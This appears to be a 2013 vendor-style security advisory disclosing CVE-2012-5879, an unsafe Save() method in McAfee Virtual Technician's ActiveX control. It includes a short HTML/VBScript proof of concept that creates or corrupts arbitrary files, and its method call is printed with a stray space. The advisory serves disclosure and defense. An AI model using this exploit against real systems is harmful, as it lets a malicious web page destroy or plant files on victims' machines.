San Francisco: +1 (415) 635 3784  |  Geneva: +41 (22) 723 2424   |  
ImmuniWeb®: Login | Register
ImmuniWeb® by High-Tech Bridge


High-Tech Bridge Newsletter

Subscribe to our newsletter and receive some or all of our corporate news, invitations to security events or HTB Security Advisories – you choose what you want to receive.

McAfee Virtual Technician ActiveX Control Insecure Method

Advisory ID:HTB23128
Product:McAfee Virtual Technician (MVT) 6.5.0.2101
Vendor:McAfee
Vulnerable Versions:6.5.0.2101 and probably prior
Tested Version:6.5.0.2101 on Windows 7 SP1 and Internet Explorer 9
Advisory Publication:November 19, 2012 [without technical details]
Vendor Notification:November 19, 2012
Vendor Fix:March 15, 2013
Public Disclosure:March 27, 2013
Latest Update:March 26, 2013
Vulnerability Type:Exposed Unsafe ActiveX Method [CWE-618]
CVE Reference:CVE-2012-5879
Risk Level:Medium
CVSSv2 Base Score:5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in McAfee Virtual Technician ActiveX control, which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system.

1) Insecure method in McAfee Virtual Technician ActiveX control: CVE-2012-5879
The vulnerability exists due to the ActiveX control including the insecure "Save()" method in "McHealthCheck.dll" DLL. This can be exploited to corrupt or create arbitrary files in the context of the current user.
The following PoC code is available:
<html>
<h4>McAfee Virtual Technician [McHealthCheck.dll] v.6.5.0.2101</h4>
<h5>This proof of concepts creates an arbitrary file in a system [Windows 7, SP1 with IE 9.0] by leveraging the McHealthCheck.dll ActiveX module and the method "Save()":</h5>
<object classid='clsid:24565A99-ADDA-47B9-9E86-3C4C3360E256' id='target'></object>
<input type="button" value="Boom!" language="VBScript" OnClick="CreateArbitraryFile()">
<script language="VBScript">
sub CreateArbitraryFile()
arg1="FilePath\File_name_to_corrupt_or_create"
target.Sa ve arg1
End Sub
</script>
</html>


ImmuniWeb® On-Demand Web Application Penetration Test


Solution:
Upgrade to McAfee Virtual Technician (MVT) 7.1
More Information:
https://kc.mcafee.com/corporate/index?page=content&id=SB10040


References:
[1] High-Tech Bridge Advisory HTB23128 - https://www.htbridge.com/advisory/HTB23128 - McAfee Virtual Technician ActiveX control Insecure Method.
[2] McAfee Virtual Technician - mvt.mcafee.com - McAfee Virtual Technician collects information on your computer system so that McAfee can diagnose and solve problems related to your McAfee software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
User Comments and Opinions


Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.